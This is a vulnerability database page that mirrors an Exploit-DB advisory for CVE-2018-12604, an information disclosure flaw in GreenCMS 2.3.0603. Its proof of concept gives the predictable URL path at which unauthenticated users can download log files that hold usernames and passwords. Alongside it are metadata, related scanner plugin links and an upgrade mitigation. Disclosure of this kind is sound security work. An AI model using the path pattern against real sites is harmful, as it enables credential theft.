header-logo
Suggest Exploit
vendor:
GreenCMS
by:
vr_system
7.5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: GreenCMS
Affected Version From: 2.3.0603
Affected Version To: 2.3.0603
Patch Exists: YES
Related CWE: CVE-2018-12604
CPE: a:greencms:greencms:2.3.0603
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=154752https://www.infosecmatter.com/nessus-plugin-library/?id=111223https://www.infosecmatter.com/nessus-plugin-library/?id=105262https://www.infosecmatter.com/nessus-plugin-library/?id=103575https://www.infosecmatter.com/nessus-plugin-library/?id=45133https://www.infosecmatter.com/nessus-plugin-library/?id=44095https://www.infosecmatter.com/nessus-plugin-library/?id=45004https://www.infosecmatter.com/nessus-plugin-library/?id=42052
Platforms Tested: Windows 7
2018

GreenCMS 2.3.0603 – remote obtain sensitive information

A vulnerability in GreenCMS 2.3.0603 allows an unauthenticated attacker to remotely obtain sensitive information. By sending a specially crafted request to the vulnerable server, an attacker can access the log file which contains sensitive information such as usernames and passwords.

Mitigation:

Upgrade to the latest version of GreenCMS.
Source

Exploit-DB raw data:

# Exploit Title: GreenCMS 2.3.0603 - remote obtain sensitive information
# Date: 2018-06-21
# Exploit Author: vr_system
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS/
# Software Link: https://github.com/GreenCMS/GreenCMS/
# Version: GreenCMS 2.3.0603
# Tested on: windows 7
# CVE : CVE-2018-12604

#  POC£ºhttp://site.com/Data/Log/year_month_day.log.
# Tested Link: 
http://site.com/GreenCMS-beta/Data/Log/18_06_20.log  
http://site.com/Data/Log/18_06_20.log

Navigation

Suggest Exploit

Services By CQR